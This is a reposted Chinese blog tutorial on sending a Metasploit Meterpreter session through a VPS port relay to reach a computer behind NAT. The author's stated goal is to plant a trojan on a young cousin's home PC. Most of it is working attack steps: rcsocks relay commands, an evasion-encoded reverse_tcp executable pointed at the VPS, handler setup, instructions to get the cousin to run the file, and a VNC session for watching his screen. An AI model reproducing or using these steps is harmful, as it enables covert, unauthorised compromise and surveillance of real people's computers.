内网穿透获得meterpreter会话

来源:互联网 发布:贝斯谱的软件 编辑:程序博客网 时间:2024/06/03 07:26

背景:我有一台Kali,IP是192.168.1.2。我还有一台VPS,公网IP是45.32.45.32。我在老家读初中的表弟有一台处在内网的电脑。我和表弟的网络都没有公网IP,不存在路由器端口映射的条件。我想给表弟的电脑植入木马,把meterpreter会话反弹给我的kali。

kali:192.168.1.2
VPS:45.32.45.32
表弟的电脑:192.168.2.33

1、在VPS上进行端口转发,可以用 sSocks,lcx,ssh,rinetd 等工具。本例用sSocks演示。

root@K:~# rcsocks -l 7501 -p 7502

侦听两个端口,7501用来接收来自受害者反弹的shell,7502将7501的流量转发出去。

2、回到kali,进入msf控制台,生成一个攻击载荷(payload)

msfconsole -qmsf > use payload/windows/meterpreter/reverse_tcpmsf > payload(reverse_tcp) > set lhost 45.32.45.32lhost => 45.32.45.32 msf > payload(reverse_tcp) > set lport 7501lport => 7501msf > payload(reverse_tcp) > generate -b '\x00\xff' -t exe -e x86/shikata_ga_nai -i 5 -f /root/meter.exe[*] Writing 73802 bytes to /root/meter.exe...

运行这个木马会把meterpreter会话发送到VPS的7501端口。
回到msf主界面,使用接收模块。设置payload

msf > payload(reverse_tcp) > backmsf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcpmsf exploit(handler) > set rhost 45.32.45.32rhost => 45.32.45.32msf exploit(handler) > set lport 7502lport => 7502msf exploit(handler) > exploit[*] Started bind handler[*] Sending stage (957999 bytes) to 45.32.45.32[*] Starting the payload handler...

3、将之前制作好的木马发给表弟,让他运行。

[*] Meterpreter session 0 opened (192.168.1.2:34577 -> 45.32.45.32:7502) at 2017-10-6 20:38:22 +0800meterpreter > run vnc

这里写图片描述